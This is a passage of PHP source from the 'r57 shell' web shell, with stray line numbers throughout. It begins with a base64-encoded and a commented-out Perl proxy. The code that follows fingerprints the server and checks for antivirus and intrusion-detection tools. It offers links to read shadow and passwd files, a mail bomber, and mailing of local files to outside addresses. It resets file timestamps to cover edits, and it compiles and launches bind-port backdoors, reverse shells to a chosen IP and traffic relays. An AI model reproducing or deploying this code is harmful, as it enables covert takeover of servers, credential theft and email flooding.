9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
3933
3934
CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
3935
3936
aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
3937
3938
gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
3939
3940
9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
3941
3942
3943
3944
/* ?ST SATIRIN KIRILMI? HAL? */
3945
3946
/*
3947
3948
3949
3950
#!usr/bin/perl
3951
3952
use Socket;
3953
3954
my $port = $ARGV[0]||31337;
3955
3956
my $protocol = getprotobyname('tcp');
3957
3958
my $my_addr  = sockaddr_in ($port, INADDR_ANY);
3959
3960
socket (SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket(): $!";
3961
3962
setsockopt (SOCK, SOL_SOCKET, SO_REUSEADDR,1 ) or die "setsockopt(): $!";
3963
3964
bind (SOCK, $my_addr) or die "bind(): $!";
3965
3966
listen (SOCK, SOMAXCONN) or die "listen(): $!";
3967
3968
$SIG{'INT'} = sub {
3969
3970
close (SOCK);
3971
3972
exit;
3973
3974
};
3975
3976
while (1) {
3977
3978
next unless my $remote_addr = accept (SESSION, SOCK);
3979
3980
my ($fist, $method, $remote_host, $remote_port) = analyze_request();
3981
3982
if(open_connection (REMOTE, $remote_host, $remote_port) == 0) {
3983
3984
close (SESSION);
3985
3986
next;
3987
3988
}
3989
3990
print REMOTE $first;
3991
3992
print REMOTE "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
3993
3994
while (<SESSION>) {
3995
3996
next if (/Proxy-Connection:/ || /User-Agent:/);
3997
3998
print REMOTE $_;
3999
4000
last if ($_ =~ /^[\s\x00]*$/);
4001
4002
}
4003
4004
print REMOTE "\n";
4005
4006
$header = 1;
4007
4008
while (<REMOTE>) {
4009
4010
print SESSION $_;
4011
4012
if ($header) {     
4013
4014
if ($header && $_ =~ /^[\s\x00]*$/) {
4015
4016
$header = 0;
4017
4018
}
4019
4020
}
4021
4022
}
4023
4024
close (REMOTE);
4025
4026
close (SESSION);
4027
4028
}
4029
4030
close (SOCK);
4031
4032
sub analyze_request {
4033
4034
my ($fist, $url, $remote_host, $remote_port, $method);
4035
4036
$first = <SESSION>;
4037
4038
$url = ($first =~ m|(http://\S+)|)[0];
4039
4040
($method, $remote_host, $remote_port) = 
4041
4042
($first =~ m!(GET) http://([^/:]+):?(\d*)! );
4043
4044
if (!$remote_host) {
4045
4046
close(SESSION);
4047
4048
exit;
4049
4050
}
4051
4052
$remote_port = "http" unless ($remote_port);
4053
4054
$first =~ s/http:\/\/[^\/]+//;
4055
4056
return ($first, $method, $remote_host, $remote_port);
4057
4058
}
4059
4060
sub open_connection {
4061
4062
my ($host, $port) = @_[1,2];
4063
4064
my ($dest_addr, $cur);
4065
4066
if ($port !~ /^\d+$/) {
4067
4068
$port = (getservbyname($port, "tcp"))[2];
4069
4070
$port = 80 unless ($port);
4071
4072
}
4073
4074
$host = inet_aton ($host) or return 0;
4075
4076
$dest_addr = sockaddr_in ($port, $host);
4077
4078
socket ($_[0], AF_INET, SOCK_STREAM, $protocol) or die "socket() : $!";
4079
4080
connect ($_[0], $dest_addr) or return 0;
4081
4082
$cur = select($_[0]);  
4083
4084
$| = 1;
4085
4086
select($cur);
4087
4088
return 1;
4089
4090
}
4091
4092
4093
4094
*/
4095
4096
4097
4098
4099
4100
if($unix)
4101
4102
{
4103
4104
if(!isset($_COOKIE['uname'])) {$uname = ex('uname -a');setcookie('uname',$uname);}else {$uname = $_COOKIE['uname'];}
4105
4106
if(!isset($_COOKIE['id'])) {$id = ex('id');setcookie('id',$id);}else {$id = $_COOKIE['id'];}
4107
4108
if($safe_mode) {$sysctl = '-';}
4109
4110
else if(isset($_COOKIE['sysctl'])) {$sysctl = $_COOKIE['sysctl'];}
4111
4112
else  
4113
4114
{
4115
4116
$sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
4117
4118
if(empty($sysctl)) {$sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease');}
4119
4120
if(empty($sysctl)) {$sysctl = '-';}
4121
4122
setcookie('sysctl',$sysctl);
4123
4124
}
4125
4126
}
4127
4128
echo $head;
4129
4130
echo '</head>';
4131
4132
echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333 width=160><font face=Verdana size=2>'.ws(2).'<font face=tahoma size=2><b>r57 shell '.$version.'</b></font></td><td bgcolor=#333333><font face=Verdana size=-2>';
4133
4134
echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
4135
4136
if(isset($_SERVER['X_FORWARDED_FOR'])){echo " X_FORWARDED_FOR: [<font color=red>".$_SERVER['X_FORWARDED_FOR']."</font>]";}
4137
4138
if(isset($_SERVER['CLIENT_IP'])){echo " CLIENT_IP: [<font color=red>".$_SERVER['CLIENT_IP']."</font>]";}
4139
4140
echo " Server IP: [<a href=".gethostbyname($_SERVER["HTTP_HOST"])." target=iframe><font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font></a>]";
4141
4142
echo "<br>";
4143
4144
echo ws(2)."PHP version: <b>".@phpversion()."</b>";
4145
4146
$curl_on = @function_exists('curl_version');
4147
4148
echo ws(2);
4149
4150
echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>Kapali</font>"));
4151
4152
echo "</b>".ws(2);
4153
4154
echo "MySQL: <b>";
4155
4156
$mysql_on = @function_exists('mysql_connect');
4157
4158
if($mysql_on){
4159
4160
echo "<font color=green>ON</font>";}else {echo "<font color=red>Kapali</font>";}
4161
4162
echo "</b>".ws(2);
4163
4164
echo "MSSQL: <b>";
4165
4166
$mssql_on = @function_exists('mssql_connect');
4167
4168
if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>Kapali</font>";}
4169
4170
echo "</b>".ws(2);
4171
4172
echo "PostgreSQL: <b>";
4173
4174
$pg_on = @function_exists('pg_connect');
4175
4176
if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>Kapali</font>";}
4177
4178
echo "</b>".ws(2);
4179
4180
echo "Oracle: <b>";
4181
4182
$ora_on = @function_exists('ocilogon');
4183
4184
if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>Kapali</font>";}
4185
4186
echo "</b><br>".ws(2);
4187
4188
echo "Safe_mode: <b>";
4189
4190
echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>Kapali</font>"));
4191
4192
echo "</b>".ws(2);
4193
4194
echo "Open_basedir: <b>";
4195
4196
if($open_basedir) {if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=green>$df</font></b>";};}
4197
4198
else {echo "<font color=red>NONE</font></b>";}
4199
4200
echo ws(2)."Safe_mode_exec_dir: <b>";
4201
4202
if(@function_exists('ini_get')) {if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
4203
4204
else {echo "<font color=red>ini_get disable!</font></b>";}
4205
4206
echo ws(2)."Safe_mode_include_dir: <b>";
4207
4208
if(@function_exists('ini_get')) {if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
4209
4210
else {echo "<font color=red>ini_get disable!</font></b>";}
4211
4212
echo "<br>".ws(2);
4213
4214
echo "Disable functions : <b>";$df='ini_get  disable!';
4215
4216
if((@function_exists('ini_get')) &&(''==($df=@ini_get('disable_functions')))){echo "<font color=red>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
4217
4218
$free = @diskfreespace($dir);
4219
4220
if (!$free) {$free = 0;}
4221
4222
$all = @disk_total_space($dir);
4223
4224
if (!$all) {$all = 0;}
4225
4226
echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
4227
4228
$ust='';
4229
4230
if($unix &&!$safe_mode){
4231
4232
if (which('gcc')) {$ust.="gcc,";}
4233
4234
if (which('cc')) {$ust.="cc,";}
4235
4236
if (which('ld')) {$ust.="ld,";}
4237
4238
if (which('php')) {$ust.="php,";}
4239
4240
if (which('perl')) {$ust.="perl,";}
4241
4242
if (which('python')) {$ust.="python,";}
4243
4244
if (which('ruby')) {$ust.="ruby,";}
4245
4246
if (which('make')) {$ust.="make,";}
4247
4248
if (which('tar')) {$ust.="tar,";}
4249
4250
if (which('nc')) {$ust.="netcat,";}
4251
4252
if (which('locate')) {$ust.="locate,";}
4253
4254
if (which('suidperl')) {$ust.="suidperl,";}
4255
4256
}
4257
4258
if (@function_exists('pcntl_exec')) {$ust.="pcntl_exec,";}
4259
4260
if($ust){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust."</font>";}
4261
4262
$ust='';
4263
4264
if($unix &&!$safe_mode){
4265
4266
if (which('kav')) {$ust.="kav,";}
4267
4268
if (which('nod32')) {$ust.="nod32,";}
4269
4270
if (which('bdcored')) {$ust.="bitdefender,";}
4271
4272
if (which('uvscan')) {$ust.="mcafee,";}
4273
4274
if (which('sav')) {$ust.="symantec,";}
4275
4276
if (which('drwebd')) {$ust="drwebd,";}
4277
4278
if (which('clamd')) {$ust.="clamd,";}
4279
4280
if (which('rkhunter')) {$ust.="rkhunter,";}
4281
4282
if (which('chkrootkit')) {$ust.="chkrootkit,";}
4283
4284
if (which('iptables')) {$ust.="iptables,";}
4285
4286
if (which('ipfw')) {$ust.="ipfw,";}
4287
4288
if (which('tripwire')) {$ust.="tripwire,";}
4289
4290
if (which('shieldcc')) {$ust.="stackshield,";}
4291
4292
if (which('portsentry')) {$ust.="portsentry,";}
4293
4294
if (which('snort')) {$ust.="snort,";}
4295
4296
if (which('ossec')) {$ust.="ossec,";}
4297
4298
if (which('lidsadm')) {$ust.="lidsadm,";}
4299
4300
if (which('tcplodg')) {$ust.="tcplodg,";}
4301
4302
if (which('tripwire')) {$ust.="tripwire,";}
4303
4304
if (which('sxid')) {$ust.="sxid,";}
4305
4306
if (which('logcheck')) {$ust.="logcheck,";}
4307
4308
if (which('logwatch')) {$ust.="logwatch,";}
4309
4310
}
4311
4312
if (@function_exists('apache_get_modules') &&@in_array('mod_security',apache_get_modules())) {$ust.="mod_security,";}
4313
4314
if($ust){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>$ust</font>";}
4315
4316
echo "<br>".ws(2)."</b>";
4317
4318
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
4319
4320
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
4321
4322
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
4323
4324
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
4325
4326
if(!$unix) {
4327
4328
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?systeminfo title=\"".$lang[$language.'_text50']."\"><b>systeminfo</b></a> ".$rb;
4329
4330
}else{
4331
4332
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?syslog title=\"View syslog.conf\"><b>syslog</b></a> ".$rb;
4333
4334
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?resolv title=\"View resolv\"><b>resolv</b></a> ".$rb;
4335
4336
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?hosts title=\"View hosts\"><b>hosts</b></a> ".$rb;
4337
4338
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?shadow title=\"View shadow\"><b>shadow</b></a> ".$rb;
4339
4340
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?passwd title=\"".$lang[$language.'_text95']."\"><b>passwd</b></a> ".$rb;
4341
4342
}
4343
4344
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
4345
4346
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb;
4347
4348
if($unix &&!$safe_mode) 
4349
4350
{
4351
4352
echo "<br>".ws(2)."</b>";
4353
4354
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?procinfo title=\"View procinfo\"><b>procinfo</b></a> ".$rb;
4355
4356
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?version title=\"View proc version\"><b>version</b></a> ".$rb;
4357
4358
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?free title=\"View mem free\"><b>free</b></a> ".$rb;
4359
4360
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?dmesg(8) title=\"View dmesg\"><b>dmesg</b></a> ".$rb;
4361
4362
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?vmstat title=\"View vmstat\"><b>vmstat</b></a> ".$rb;
4363
4364
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lspci title=\"View lspci\"><b>lspci</b></a> ".$rb;
4365
4366
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsdev title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
4367
4368
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?interrupts title=\"View interrupts\"><b>interrupts</b></a> ".$rb;
4369
4370
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise1 title=\"View realise1\"><b>realise1</b></a> ".$rb;
4371
4372
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise2 title=\"View realise2\"><b>realise2</b></a> ".$rb;
4373
4374
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsattr title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
4375
4376
echo "<br>".ws(2)."</b>";
4377
4378
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?w title=\"View w\"><b>w</b></a> ".$rb;
4379
4380
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?who title=\"View who\"><b>who</b></a> ".$rb;
4381
4382
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?uptime title=\"View uptime\"><b>uptime</b></a> ".$rb;
4383
4384
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?last title=\"View last -n 10\"><b>last</b></a> ".$rb;
4385
4386
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?psaux title=\"View ps -aux\"><b>ps aux</b></a> ".$rb;
4387
4388
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?service title=\"View service\"><b>service</b></a> ".$rb;
4389
4390
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ifconfig title=\"View ifconfig\"><b>ifconfig</b></a> ".$rb;
4391
4392
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?netstat title=\"View netstat -a\"><b>netstat</b></a> ".$rb;
4393
4394
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fstab title=\"View fstab\"><b>fstab</b></a> ".$rb;
4395
4396
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fdisk title=\"View fdisk -l\"><b>fdisk</b></a> ".$rb;
4397
4398
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?df title=\"View df -h\"><b>df -h</b></a> ".$rb;
4399
4400
}
4401
4402
echo '</font></td></tr><table>
4403
4404
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000>
4405
4406
<tr><td align=right width=100>';
4407
4408
echo $font;
4409
4410
if($unix){
4411
4412
echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
4413
4414
echo "</td><td>";
4415
4416
echo "<font face=Verdana size=-2 color=red><b>";
4417
4418
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
4419
4420
echo ws(3).$sysctl."<br>";
4421
4422
echo ws(3).ex('echo $OSTYPE')."<br>";
4423
4424
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
4425
4426
if(!empty($id)) {echo ws(3).$id."<br>";}
4427
4428
else if(@function_exists('posix_geteuid') &&@function_exists('posix_getegid') &&@function_exists('posix_getgrgid') &&@function_exists('posix_getpwuid'))
4429
4430
{
4431
4432
$euserinfo  = @posix_getpwuid(@posix_geteuid());
4433
4434
$egroupinfo = @posix_getgrgid(@posix_getegid());
4435
4436
echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
4437
4438
}
4439
4440
else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
4441
4442
echo ws(3).$dir;
4443
4444
echo ws(3).'( '.perms(@fileperms($dir)).' )';
4445
4446
echo "</b></font>";
4447
4448
}
4449
4450
else
4451
4452
{
4453
4454
echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
4455
4456
echo "</td><td>";
4457
4458
echo "<font face=Verdana size=-2 color=red><b>";
4459
4460
echo ws(3).@substr(@php_uname(),0,120)."<br>";
4461
4462
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
4463
4464
echo ws(3).@getenv("USERNAME")."<br>";
4465
4466
echo ws(3).$dir;
4467
4468
echo "<br></font>";
4469
4470
}
4471
4472
echo "</font>";
4473
4474
echo "</td></tr></table>";
4475
4476
if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail")
4477
4478
{
4479
4480
$res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
4481
4482
err(6+$res);
4483
4484
$_POST['cmd']="";
4485
4486
}
4487
4488
if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail_file"&&!empty($_POST['loc_file']))
4489
4490
{
4491
4492
if($file=@fopen($_POST['loc_file'],"r")){$filedump = @fread($file,@filesize($_POST['loc_file']));@fclose($file);}
4493
4494
else if ($file=readzlib($_POST['loc_file'])) {$filedump = $file;}else {err(1,$_POST['loc_file']);$_POST['cmd']="";}
4495
4496
if(isset($_POST['cmd'])) 
4497
4498
{
4499
4500
$filename = @basename($_POST['loc_file']);
4501
4502
$content_encoding=$mime_type='';
4503
4504
compress($filename,$filedump,$_POST['compress']);
4505
4506
$attach = array(
4507
4508
"name"=>$filename,
4509
4510
"type"=>$mime_type,
4511
4512
"content"=>$filedump
4513
4514
);
4515
4516
if(empty($_POST['subj'])) {$_POST['subj'] = 'file from r57';}
4517
4518
if(empty($_POST['from'])) {$_POST['from'] = 'billy@microsoft.com';}
4519
4520
$res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
4521
4522
err(6+$res);
4523
4524
$_POST['cmd']="";
4525
4526
}
4527
4528
}
4529
4530
if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail_bomber"&&!empty($_POST['mail_flood']) &&!empty($_POST['mail_size']))
4531
4532
{
4533
4534
for($h=1;$h<=$_POST['mail_flood'];$h++){
4535
4536
$res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ",1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
4537
4538
}
4539
4540
err(6+$res);
4541
4542
$_POST['cmd']="";
4543
4544
}
4545
4546
if(!empty($_POST['cmd']) &&$_POST['cmd'] == "find_text")
4547
4548
{
4549
4550
$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
4551
4552
}
4553
4554
if(!empty($_POST['cmd']) &&$_POST['cmd']=="ch_")
4555
4556
{
4557
4558
switch($_POST['what'])
4559
4560
{
4561
4562
case 'own':
4563
4564
@chown($_POST['param1'],$_POST['param2']);
4565
4566
break;
4567
4568
case 'grp':
4569
4570
@chgrp($_POST['param1'],$_POST['param2']);
4571
4572
break;
4573
4574
case 'mod':
4575
4576
@chmod($_POST['param1'],intval($_POST['param2'],8));
4577
4578
break;
4579
4580
}
4581
4582
$_POST['cmd']="";
4583
4584
}
4585
4586
if(!empty($_POST['cmd']) &&$_POST['cmd']=="mk")
4587
4588
{
4589
4590
switch($_POST['what'])
4591
4592
{
4593
4594
case 'file':
4595
4596
if($_POST['action'] == "create")
4597
4598
{
4599
4600
if(@file_exists($_POST['mk_name']) ||!$file=@fopen($_POST['mk_name'],"w")) {err(2,$_POST['mk_name']);$_POST['cmd']="";}
4601
4602
else {
4603
4604
@fclose($file);
4605
4606
$_POST['e_name'] = $_POST['mk_name'];
4607
4608
$_POST['cmd']="edit_file";
4609
4610
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
4611
4612
}
4613
4614
}
4615
4616
else if($_POST['action'] == "delete")
4617
4618
{
4619
4620
if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
4621
4622
$_POST['cmd']="";
4623
4624
}
4625
4626
break;
4627
4628
case 'dir':
4629
4630
if($_POST['action'] == "create"){
4631
4632
if(@mkdir($_POST['mk_name']))
4633
4634
{
4635
4636
$_POST['cmd']="";
4637
4638
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
4639
4640
}
4641
4642
else {err(2,$_POST['mk_name']);$_POST['cmd']="";}
4643
4644
}
4645
4646
else if($_POST['action'] == "delete"){
4647
4648
if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
4649
4650
$_POST['cmd']="";
4651
4652
}
4653
4654
break;
4655
4656
}
4657
4658
}
4659
4660
if(!empty($_POST['cmd']) &&$_POST['cmd']=="touch")
4661
4662
{
4663
4664
if(!$_POST['file_name_r'])
4665
4666
{
4667
4668
$datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
4669
4670
$datar = @strtotime($datar);
4671
4672
@touch($_POST['file_name'],$datar,$datar);}
4673
4674
else{
4675
4676
@touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
4677
4678
}
4679
4680
$_POST['cmd']="";
4681
4682
}
4683
4684
if(!empty($_POST['cmd']) &&$_POST['cmd']=="edit_file"&&!empty($_POST['e_name']))
4685
4686
{
4687
4688
if(!$file=@fopen($_POST['e_name'],"r+")) {$filedump = @fread($file,@filesize($_POST['e_name']));@fclose($file);$only_read = 1;}
4689
4690
if($file=@fopen($_POST['e_name'],"r")) {$filedump = @fread($file,@filesize($_POST['e_name']));@fclose($file);}
4691
4692
else if ($file=readzlib($_POST['e_name'])) {$filedump = $file;$only_read = 1;}else {err(1,$_POST['e_name']);$_POST['cmd']="";}
4693
4694
if(isset($_POST['cmd'])) 
4695
4696
{
4697
4698
echo $table_up3;
4699
4700
echo $font;
4701
4702
echo "<form name=save_file method=post>";
4703
4704
echo ws(3)."<b>".$_POST['e_name']."</b>";
4705
4706
echo "<div align=center><textarea name=e_text cols=121 rows=24>";
4707
4708
echo @htmlspecialchars($filedump);
4709
4710
echo "</textarea>";
4711
4712
echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
4713
4714
echo "<input type=hidden name=dir value=".$dir.">";
4715
4716
echo "<input type=hidden name=cmd value=save_file>";
4717
4718
echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
4719
4720
echo "</div>";
4721
4722
echo "</font>";
4723
4724
echo "</form>";
4725
4726
echo "</td></tr></table>";
4727
4728
exit();
4729
4730
}
4731
4732
}
4733
4734
if(!empty($_POST['cmd']) &&$_POST['cmd']=="save_file")
4735
4736
{
4737
4738
$mtime = @filemtime($_POST['e_name']);
4739
4740
if((!$file=@fopen($_POST['e_name'],"w")) &&(!function_exists('file_put_contents'))) {err(0,$_POST['e_name']);}
4741
4742
else {
4743
4744
if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
4745
4746
@fwrite($file,$_POST['e_text']) or @fputs($file,$_POST['e_text']) or @file_put_contents($_POST['e_name'],$_POST['e_text']);
4747
4748
@touch($_POST['e_name'],$mtime,$mtime);
4749
4750
$_POST['cmd']="";
4751
4752
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
4753
4754
}
4755
4756
}
4757
4758
if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))
4759
4760
{
4761
4762
cf("/tmp/prxpl",$prx_pl);
4763
4764
$p2=which("perl");
4765
4766
$blah = ex($p2." /tmp/prxpl ".$_POST['proxy_port']." &");
4767
4768
$_POST['cmd']="ps -aux | grep prxpl";
4769
4770
}
4771
4772
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
4773
4774
{
4775
4776
cf("/tmp/bd.c",$port_bind_bd_c);
4777
4778
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
4779
4780
@unlink("/tmp/bd.c");
4781
4782
$blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
4783
4784
$_POST['cmd']="ps -aux | grep bd";
4785
4786
}
4787
4788
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
4789
4790
{
4791
4792
cf("/tmp/bdpl",$port_bind_bd_pl);
4793
4794
$p2=which("perl");
4795
4796
$blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
4797
4798
$_POST['cmd']="ps -aux | grep bdpl";
4799
4800
}
4801
4802
if (!empty($_POST['ip']) &&!empty($_POST['port']) &&($_POST['use']=="Perl"))
4803
4804
{
4805
4806
cf("/tmp/back",$back_connect);
4807
4808
$p2=which("perl");
4809
4810
$blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
4811
4812
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
4813
4814
}
4815
4816
if (!empty($_POST['ip']) &&!empty($_POST['port']) &&($_POST['use']=="C"))
4817
4818
{
4819
4820
cf("/tmp/back.c",$back_connect_c);
4821
4822
$blah = ex("gcc -o /tmp/backc /tmp/back.c");
4823
4824
@unlink("/tmp/back.c");
4825
4826
$blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
4827
4828
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
4829
4830
}
4831
4832
if (!empty($_POST['local_port']) &&!empty($_POST['remote_host']) &&!empty($_POST['remote_port']) &&($_POST['use']=="Perl"))
4833
4834
{
4835
4836
cf("/tmp/dp",$datapipe_pl);
4837
4838
$p2=which("perl");
4839
4840
$blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
4841
4842
$_POST['cmd']="ps -aux | grep dp";
4843
4844
}
4845
4846
if (!empty($_POST['local_port']) &&!empty($_POST['remote_host']) &&!empty($_POST['remote_port']) &&($_POST['use']=="C"))
4847
4848
{
4849
4850
cf("/tmp/dpc.c",$datapipe_c);
4851
4852
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
4853
4854
@unlink("/tmp/dpc.c");
4855
4856
$blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
4857
4858
$_POST['cmd']="ps -aux | grep dpc";
4859
4860
}
4861
4862
if (!empty($_POST['alias']) &&isset($aliases[$_POST['alias']])) {$_POST['cmd'] = $aliases[$_POST['alias']];}
4863
4864
for($upl=0;$upl<=16;$upl++)
4865
4866
{
4867
4868
if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
4869
4870
if(!empty($_POST['new_name']) &&($upl==0)) {$nfn = $_POST['new_name'];}
4871
4872
else {$nfn = $HTTP_POST_FILES['userfile'.$upl]['name'];}
4873
4874
